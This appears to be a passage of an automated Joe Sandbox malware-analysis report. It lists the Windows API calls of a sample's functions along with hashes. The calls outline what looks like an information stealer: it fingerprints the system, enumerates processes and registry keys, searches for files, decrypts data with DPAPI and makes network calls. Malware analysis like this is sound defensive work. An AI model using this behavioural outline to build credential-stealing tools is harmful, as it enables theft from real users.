                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042F6AA8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042F6A78), ref: 0041496D
                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,042F3428,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                              • String ID: E.A
                                                                                                                                                                                                                              • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                              • Opcode ID: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
                                                                                                                                                                                                                              • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                                                                                                              • Opcode ID: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
                                                                                                                                                                                                                              • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,042F65E0), ref: 0040971B
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                              • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                              • Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                              • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3491751439-0
                                                                                                                                                                                                                              • Opcode ID: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
                                                                                                                                                                                                                              • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b9c76edc9b258419c7f4614c7dcd789399bcf7f85242a03647ad0e6e1076ea1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                              • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                              • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                              • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Pi@
                                                                                                                                                                                                                              • API String ID: 0-1360946908
                                                                                                                                                                                                                              • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                              • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                              • Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                              • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0828), ref: 0040EFCE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0838), ref: 0040F06F
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0868), ref: 0040F17E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                              • Opcode ID: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
                                                                                                                                                                                                                              • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63b8197388c09f0171e1c296f62c96a59776cbd33401b2079ac3cf9a783bfc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0828), ref: 0040EFCE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0838), ref: 0040F06F
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,042F0868), ref: 0040F17E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                              • Opcode ID: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
                                                                                                                                                                                                                              • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db141857ae5d5c02fff8448f4ee19de15e2a37c00ac90ce392829f9e5a1f652a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F71A0), ref: 00412838
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,042F0A18), ref: 0041269B
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
